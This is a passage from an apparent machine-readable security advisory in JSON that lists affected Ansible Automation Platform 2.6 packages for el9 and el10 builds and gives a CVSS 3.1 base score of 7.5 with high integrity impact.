"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
